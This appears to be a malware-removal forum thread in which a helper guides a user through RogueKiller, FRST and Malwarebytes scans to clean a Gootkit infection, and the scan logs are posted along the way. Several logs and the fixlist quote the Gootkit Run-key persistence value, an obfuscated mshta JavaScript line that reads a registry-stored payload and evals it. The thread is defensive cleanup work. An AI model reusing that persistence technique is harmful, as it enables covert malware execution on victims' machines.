[Tr.Gootkit] (X86) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Run | 2f892c0f : mshta javascript:HmndQX1LU="zYf";lj4=new%20ActiveXObject("WScript.Shell");OlJv4wdo="SPkO";FF7Dq=lj4.RegRead("HKCU\\software\\4894f2649e\\60cda022");qH0DvILKM="DW9";eval(FF7Dq);Fvfo6zh0pK="w5P"; [x][x] -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 1 ¤¤¤
[PUM.HomePage][FIREFX:Config] 21kim9lc.default-1455458506894 : user_pref("browser.startup.homepage", "http://www.wmcactionnews5.com/");-> Found

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: Hitachi HDS721010CLA332 ATA Device +++++
— User —
[MBR] 09ca43984b597e471acdcb4c96baadfe
[BSP] 65ab201fc7625de52b04b51f28d7e468 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 953767 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 … OK
User = LL2 … OK
 

Run RogueKiller

Please do another scan with RogueKiller.

When it shows the results, under the “Processes” tab, check all the boxes next to these:
 

[Proc.Injected] firefox.exe(5192) – C:\Program Files (x86)\Mozilla Firefox\firefox.exe[x] -> Found
[Proc.Injected|Proc.RunPE] regsvr32.exe(2292) – C:\Windows\SysWOW64\regsvr32.exe[x] -> Found
[Proc.Injected|Proc.RunPE] regsvr32.exe(2432) – C:\Windows\SysWOW64\regsvr32.exe[x] -> Found
  • then press the Delete button.

Under the “Registry” tab, make sure these are checked:
 

[Suspicious.Path|VT.Unknown] (X64) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Run | eb72c195 : "C:\Users\kathy\AppData\Local\fb05b4\0b8081.lnk" [-] -> Found
[Tr.Gootkit] (X64) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Run | 2f892c0f : mshta javascript:HmndQX1LU="zYf";lj4=new%20ActiveXObject("WScript.Shell");OlJv4wdo="SPkO";FF7Dq=lj4.RegRead("HKCU\\software\\4894f2649e\\60cda022");qH0DvILKM="DW9";eval(FF7Dq);Fvfo6zh0pK="w5P"; [x][x] -> Found
[Tr.Gootkit] (X86) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Run | 2f892c0f : mshta javascript:HmndQX1LU="zYf";lj4=new%20ActiveXObject("WScript.Shell");OlJv4wdo="SPkO";FF7Dq=lj4.RegRead("HKCU\\software\\4894f2649e\\60cda022");qH0DvILKM="DW9";eval(FF7Dq);Fvfo6zh0pK="w5P"; [x][x] -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
  • then press the Delete button.

Once again in the RogueKiller console, click the “Web Browser” tab , make sure there is a checkmark next to this:
 

[PUM.HomePage][FIREFX:Config] 21kim9lc.default-1455458506894 : user_pref("browser.startup.homepage", "http://www.wmcactionnews5.com/");-> Found
  • then press the Delete button.
  • when you’ve done that, please run RogueKiller again and send a new log.

================================================

Run Farbar Recovery Scan Tool

Open notepad. Please copy the contents of the code box below and paste it into Notepad.

HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\…\Run: [**eb72c195<*>] => "C:\Users\kathy\AppData\Local\fb05b4\0b8081.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\…\Run: [**2f892c0f<*>] => mshta javascript:HmndQX1LU="zYf";lj4=new%20ActiveXObject("WScript.Shell");OlJv4wdo="SPkO";FF7Dq=lj4.RegRead("HKCU\\software\\4894f2649e\\60cda022");qH0DvILKM="DW9";eval(FF7Dq);Fvfo6zh0pK="w5P"; <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} =>  No File
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MNMTDF&pc=MANM&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms}
SearchScopes: HKLM-x32 -> {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MNMTDF&pc=MANM&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3123285271-2719112281-3259339859-1000 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3123285271-2719112281-3259339859-1000 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms}
BHO-x32: No Name -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> No File
R2 BitDefenderCOM; C:\Program Files\BDServices\BitDefenderCom.exe [1075712 2016-03-05] (Digital Care Solutions) [File not signed]
S3 cpuz134; \??\C:\Users\kathy\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X]
S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
S3 MREMPR5; \??\C:\PROGRA~2\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~2\COMMON~1\Motive\MRENDIS5.SYS [X]
S3 X6va015; \??\C:\Windows\SysWOW64\Drivers\X6va015 [X]
2016-05-02 19:16 - 2016-05-02 19:16 - 00000000 ____D C:\Program Files\BDServices
C:\Users\kathy\AppData\Local\Temp\dllnt_dump.dll
C:\Users\kathy\AppData\Local\Temp\libeay32.dll
C:\Users\kathy\AppData\Local\Temp\msvcr120.dll
C:\Users\kathy\AppData\Local\Temp\sqlite3.dll
AlternateDataStreams: C:\ProgramData\TEMP:430C6D84 [127]
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2 [284]
EmptyTemp:

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • save the files as fixlist.txt in the same folder as FRST – NOTE: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work
  • run FRST64 then click Fix just once and wait
  • it will create a log on your desktop, (Fixlog.txt); please post it to your reply.

Logs to include with next post:

New Rogue Killer log
Fixlog.txt


Thanks

Satchfan

 

Here are the logs

 

 

RogueKiller V12.1.5.0 [May  2 2016] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/software/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : kathy [Administrator]
Started from : C:\Users\kathy\Desktop\RogueKiller.exe
Mode : Scan – Date : 05/04/2016 19:45:06

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 0 ¤¤¤

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 1 ¤¤¤
[PUM.HomePage][FIREFX:Config] 21kim9lc.default-1455458506894 : user_pref("browser.startup.homepage", "wmctv.com"); -> Found

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: Hitachi HDS721010CLA332 ATA Device +++++
— User —
[MBR] 09ca43984b597e471acdcb4c96baadfe
[BSP] 65ab201fc7625de52b04b51f28d7e468 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 953767 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 … OK
User = LL2 … OK

 

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version:05-05-2016 01
Ran by [removed] (2016-05-04 19:07:28) Run:1
Running from C:\Users\[removed]\Desktop\frst
[removed] Boot Mode: Normal
==============================================

fixlist content:
*****************


HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\…\Run: [**eb72c195<*>] => "C:\Users\kathy\AppData\Local\fb05b4\0b8081.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\…\Run: [**2f892c0f<*>] => mshta
javascript:HmndQX1LU="zYf";lj4=new%20ActiveXObject("WScript.Shell");OlJv4wdo="SPkO";FF7Dq=lj4.RegRead("HKCU\\software\\4894f2649e\\60cda022");qH0DvILKM="DW9";eval(FF7Dq);Fvfo6zh0pK="w5P"; <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} =>  No File
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form;=MNMTDF&pc;=MANM&src;=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
SearchScopes: HKLM-x32 -> {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form;=MNMTDF&pc;=MANM&src;=IE-SearchBox
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL =
hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
SearchScopes: HKU\S-1-5-21-3123285271-2719112281-3259339859-1000 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
SearchScopes: HKU\S-1-5-21-3123285271-2719112281-3259339859-1000 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
BHO-x32: No Name -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> No File
R2 BitDefenderCOM; C:\Program Files\BDServices\BitDefenderCom.exe [1075712 2016-03-05] (Digital Care Solutions) [File not signed]
S3 cpuz134; \??\C:\Users\kathy\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X]
S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
S3 MREMPR5; \??\C:\PROGRA~2\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~2\COMMON~1\Motive\MRENDIS5.SYS [X]
S3 X6va015; \??\C:\Windows\SysWOW64\Drivers\X6va015 [X]
2016-05-02 19:16 -
2016-05-02 19:16 - 00000000 ____D C:\Program Files\BDServices
C:\Users\kathy\AppData\Local\Temp\dllnt_dump.dll
C:\Users\kathy\AppData\Local\Temp\libeay32.dll
C:\Users\kathy\AppData\Local\Temp\msvcr120.dll
C:\Users\kathy\AppData\Local\Temp\sqlite3.dll
AlternateDataStreams: C:\ProgramData\TEMP:430C6D84 [127]
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2 [284]
EmptyTemp:
*****************

HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**eb72c195<*> => value removed successfully
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**2f892c0f<*> => value not found.
javascript:HmndQX1LU="zYf";lj4=new%20ActiveXObject("WScript.Shell");OlJv4wdo="SPkO";FF7Dq=lj4.RegRead("HKCU\\software\\4894f2649e\\60cda022");qH0DvILKM="DW9";eval(FF7Dq);Fvfo6zh0pK="w5P"; <===== ATTENTION (Value Name with invalid characters) => Error: No automatic fix found for this entry.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\GDriveSharedOverlay" => key removed successfully
HKCR\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => key removed successfully
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{21A51130-7285-49FE-B3F6-2385CC71CDEA}" => key removed successfully
HKCR\CLSID\{21A51130-7285-49FE-B3F6-2385CC71CDEA} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{21A51130-7285-49FE-B3F6-2385CC71CDEA}" => key removed successfully
HKCR\Wow6432Node\CLSID\{21A51130-7285-49FE-B3F6-2385CC71CDEA} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F}" => key removed successfully
HKCR\Wow6432Node\CLSID\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} => key not found.
hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms} => Error: No automatic fix found for this entry.
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F}" => key removed successfully
HKCR\CLSID\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E15A8DC0-8516-42A1-81EA-DC94EC1ACF10}" => key removed successfully
HKCR\Wow6432Node\CLSID\{E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} => key not found.
BitDefenderCOM => Service stopped successfully.
BitDefenderCOM => service removed successfully
cpuz134 => service removed successfully
cpuz135 => service removed successfully
MREMPR5 => service removed successfully
MRENDIS5 => service removed successfully
X6va015 => service removed successfully
"2016-05-02 19:16 -" => not found.
C:\Program Files\BDServices => moved successfully
C:\Users\kathy\AppData\Local\Temp\dllnt_dump.dll => moved successfully
C:\Users\kathy\AppData\Local\Temp\libeay32.dll => moved successfully
C:\Users\kathy\AppData\Local\Temp\msvcr120.dll => moved successfully
C:\Users\kathy\AppData\Local\Temp\sqlite3.dll => moved successfully
C:\ProgramData\TEMP => ":430C6D84" ADS removed successfully.
C:\ProgramData\TEMP => ":DFC5A2B2" ADS removed successfully.
EmptyTemp: => 736.6 MB temporary data Removed.


The system needed a reboot.

==== End of Fixlog 19:07:44 ====
 

Run Malwarebytes’ Anti-Malware

I noticed that you had MBAM on your system: if you no longer have it, you can download it from here:

  • start Malwarebytes-Anti-Malware and update it, (“Update” tab}
  • once it is updated, click on “Scan” tab, select Threat Scan, then click Scan.
  • when the scan is complete, if no malicious items are found you can close the program
  • if malicious items are found be sure that everything is checked and click Quarantine
  • when removal is completed, a log report will open in Notepad and you may be prompted to restart your computer. (see Note below)
  • the log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
  • copy and paste the contents of that report in your next reply and exit MBAM.

NOTE: If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts. Click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot will prevent MBAM from removing all the malware

Can you tell me if there are any outstanding problems.

Satchfan

 

threat scan showed no threats detected  Hopefully, this is the log you want.      All seems to be good, not noticing any problems at this time.

 

<logs><record toVersion="2016.5.5.1" name="Malware Database" last_modified_tag="702b45e9-dea3-48d3-a2c4-524796b810ad" fromVersion="2016.5.4.7" systemname="KATHY-PC" username="SYSTEM" type="Update" source="Scheduler" datetime="2016-05-05T01:15:11.060533-05:00" LoggingEventType="1" severity="debug"/><record last_modified_tag="1e9afdef-1643-4454-abbd-86f9c2e31c14" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T01:15:11.262544-05:00" LoggingEventType="2" severity="debug" subtype="Refresh" result="Starting"/><record last_modified_tag="c5a54cdf-5e14-48ee-81b7-72d649b8aae6" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T01:15:11.433554-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Stopping"/><record last_modified_tag="45e1fb93-b1fd-4c48-b3e3-4ddb0bb87737" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T01:15:11.746572-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Stopped"/><record last_modified_tag="e54bae70-c5fa-46a9-8d41-4c7474f36f11" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T01:15:27.293461-05:00" LoggingEventType="2" severity="debug" subtype="Refresh" result="Success"/><record last_modified_tag="43b6f0e1-b186-452d-918c-4858ad6b5ffd" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T01:15:27.469471-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Starting"/><record last_modified_tag="15cb2ad1-b5ca-4d3c-9eb6-d909b8032f9b" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T01:15:28.995559-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Started"/><record last_modified_tag="8b44e677-cfee-4a28-b03a-bde45ffec337" systemname="KATHY-PC" username="SYSTEM" type="Scan" source="Context" datetime="2016-05-05T02:53:14.879068-05:00" LoggingEventType="6" severity="debug" scanresult="completed" nonmalwaredetections="0" malwaredetections="0" duration="552" starttime="2016-05-05T02:44:01-05:00" scantype="threat"/><record last_modified_tag="f0ecd515-a57f-4069-8f04-4859b8caf578" systemname="KATHY-PC" username="SYSTEM" type="Scan" source="Context" datetime="2016-05-05T03:03:40.418847-05:00" LoggingEventType="6" severity="debug" scanresult="completed" nonmalwaredetections="0" malwaredetections="0" duration="565" starttime="2016-05-05T02:54:14-05:00" scantype="threat"/><record toVersion="2016.5.5.2" name="Malware Database" last_modified_tag="ebe65f2f-ae18-4c36-8b78-bcf1da529e42" fromVersion="2016.5.5.1" systemname="KATHY-PC" username="SYSTEM" type="Update" source="Scheduler" datetime="2016-05-05T04:15:04.287870-05:00" LoggingEventType="1" severity="debug"/><record last_modified_tag="65376103-8f01-483e-b554-02acb4839109" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T04:15:04.440879-05:00" LoggingEventType="2" severity="debug" subtype="Refresh" result="Starting"/><record last_modified_tag="fbe07f4a-bbee-41da-a211-2cefa22ce06c" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T04:15:04.563886-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Stopping"/><record last_modified_tag="783af8af-3ac5-49fc-adb3-aad98d5a7c90" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T04:15:04.820900-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Stopped"/><record last_modified_tag="739680cc-5663-49f1-8eb6-dc68981fdd2a" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T04:15:09.204151-05:00" LoggingEventType="2" severity="debug" subtype="Refresh" result="Success"/><record last_modified_tag="173966cd-cde7-422f-81b0-ee34397940b5" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T04:15:09.335159-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Starting"/><record last_modified_tag="a20e5f43-df18-44c6-82e1-6b1db04d7bca" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T04:15:10.851245-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Started"/><record toVersion="2016.5.5.1" name="IP Database" last_modified_tag="840c4fd4-99e1-45c4-b28d-dca58fbeb7e3" fromVersion="2016.5.4.1" systemname="KATHY-PC" username="SYSTEM" type="Update" source="Scheduler" datetime="2016-05-05T06:31:18.249394-05:00" LoggingEventType="1" severity="debug"/><record toVersion="2016.5.5.1" name="Domain Database" last_modified_tag="ffdb5756-5267-492b-ba6b-36b59530eee4" fromVersion="2016.5.4.2" systemname="KATHY-PC" username="SYSTEM" type="Update" source="Scheduler" datetime="2016-05-05T06:31:18.446405-05:00" LoggingEventType="1" severity="debug"/><record last_modified_tag="ae4af8c9-cb94-49c4-95cf-892547b89e5a" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T06:31:18.653417-05:00" LoggingEventType="2" severity="debug" subtype="Refresh" result="Starting"/><record last_modified_tag="4c3112d9-cbcf-427e-bd0d-9fe7fd2c037b" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T06:31:18.845428-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Stopping"/><record last_modified_tag="69c350e0-6ccf-4833-bb27-96ab3fda4647" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T06:31:19.252451-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Stopped"/><record last_modified_tag="b63b2051-bad1-42ba-b6cd-8154e140ffc7" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T06:31:24.040725-05:00" LoggingEventType="2" severity="debug" subtype="Refresh" result="Success"/><record last_modified_tag="076cd717-3252-4b52-9023-7e3b481651c3" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T06:31:24.225736-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Starting"/><record last_modified_tag="7c05923a-d46e-4bbd-9b03-9e7b58931e5c" systemname="KATHY-PC" username="SYSTEM" type="Protection" source="Protection" datetime="2016-05-05T06:31:25.791825-05:00" LoggingEventType="2" severity="debug" subtype="Malicious Website Protection" result="Started"/><record last_modified_tag="cf6c82ac-9e83-4433-935b-c3c4767bcde9" systemname="KATHY-PC" username="SYSTEM" type="Scan" source="Manual" datetime="2016-05-05T06:42:02.679253-05:00" LoggingEventType="6" severity="debug" scanresult="completed" nonmalwaredetections="0" malwaredetections="0" duration="574" starttime="2016-05-05T06:32:27-05:00" scantype="threat"/>

logs>

I’d like to see the Malwarebytes log as a text file as it doesn’t appear that anything was fixed from the one you sent.

  • open Malwarebytes and click on the “History” tab
  • on the left click on Application Logs
  • locate the log from the first run and click on it to open it
  • click on Export and choose .txt file
  • please copy and paste the results in your reply.

Thanks

Hope this is what you want    

 

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 5/5/2016
Scan Time: 6:32 AM
Logfile: mal log.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.05.05.02
Rootkit Database: v2016.04.17.01
License: Premium
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: kathy

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 355561
Time Elapsed: 9 min, 34 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

Ask AI

AI can make mistakes. Check the cited posts. Archived advice can be out-of-date

Don't include personal information. Questions and selected public posts go to OpenAI. About Ask AI